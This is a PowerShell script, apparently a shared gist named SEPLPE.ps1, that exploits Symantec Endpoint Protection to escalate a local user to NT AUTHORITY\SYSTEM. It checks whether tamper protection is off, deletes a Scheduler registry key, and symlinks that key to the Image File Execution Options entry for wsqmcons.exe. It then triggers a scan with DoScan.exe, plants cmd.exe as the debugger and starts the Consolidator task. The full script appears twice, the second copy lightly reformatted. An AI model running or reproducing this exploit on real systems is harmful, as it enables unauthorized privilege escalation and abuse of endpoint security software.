enigma0x3/SEPLPE.ps1 Secret

## SEPLPE.ps1
Write-Host "[*] Installing NTObjectManager..." -ForeGroundColor "Green"
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Checking for Tamper Protection" -ForeGroundColor "Green"
$Result =  Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan" -Name Disabled
if($Result.Disabled -eq "1")
{
    $User = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
    $SID = $User.Value
    Write-Host "[*] User's SID is: $SID" -ForeGroundColor "Green"
    Write-Host "[*] Removing registry key..." -ForeGroundColor "Green"
    Remove-Item "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID" -Recurse -Force
    Write-Host "[*] Creating Symbolic link to IFEO on wsqmcons.exe" -ForeGroundColor "Green"
    [NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID",$null, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe")
    Write-Host "[*] Symbolic Link Created, triggering vulnerability..." -ForeGroundColor "Green"
    New-Item -Path "c:\" -Name "exploit" -ItemType "directory"
    Start-Process "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\DoScan.exe" -ArgumentList "/ScanDir C:\exploit"
    Write-Host "[*] Sleeping 10 seconds" -ForeGroundColor "Green"
    Start-Sleep "10"
    Write-Host "[*] Adding debugger key to on IFEO of wsqmcons.exe..." -ForeGroundColor "Green"
    New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe" -Name "Debugger" -PropertyType "String" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
    Write-Host "[*] Starting the Consolidator Task..." -ForeGroundColor "Green"
    Get-ScheduledTask "Consolidator" | Start-ScheduledTask
    Write-Host "Done, cmd.exe should be running as NT AUTHORITY\SYSTEM" -ForeGroundColor "Green"
} else{
    Write-Host "[!] Tamper protection on, exiting" -ForeGroundColor "Red"
}
	Write-Host "[*] Installing NTObjectManager..." -ForeGroundColor "Green"
	install-module NTObjectManager -Scope CurrentUser -Force
	import-module NTObjectManager
	Write-Host "[*] Checking for Tamper Protection" -ForeGroundColor "Green"
	$Result = Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan" -Name Disabled
	if($Result.Disabled -eq "1")
	{
	$User = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
	$SID = $User.Value
	Write-Host "[*] User's SID is: $SID" -ForeGroundColor "Green"
	Write-Host "[*] Removing registry key..." -ForeGroundColor "Green"
	Remove-Item "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID" -Recurse -Force
	Write-Host "[*] Creating Symbolic link to IFEO on wsqmcons.exe" -ForeGroundColor "Green"
	[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID",$null, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe")
	Write-Host "[*] Symbolic Link Created, triggering vulnerability..." -ForeGroundColor "Green"
	New-Item -Path "c:\" -Name "exploit" -ItemType "directory"
	Start-Process "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\DoScan.exe" -ArgumentList "/ScanDir C:\exploit"
	Write-Host "[*] Sleeping 10 seconds" -ForeGroundColor "Green"
	Start-Sleep "10"
	Write-Host "[*] Adding debugger key to on IFEO of wsqmcons.exe..." -ForeGroundColor "Green"
	New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe" -Name "Debugger" -PropertyType "String" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
	Write-Host "[*] Starting the Consolidator Task..." -ForeGroundColor "Green"
	Get-ScheduledTask "Consolidator" \| Start-ScheduledTask
	Write-Host "Done, cmd.exe should be running as NT AUTHORITY\SYSTEM" -ForeGroundColor "Green"
	} else{
	Write-Host "[!] Tamper protection on, exiting" -ForeGroundColor "Red"
	}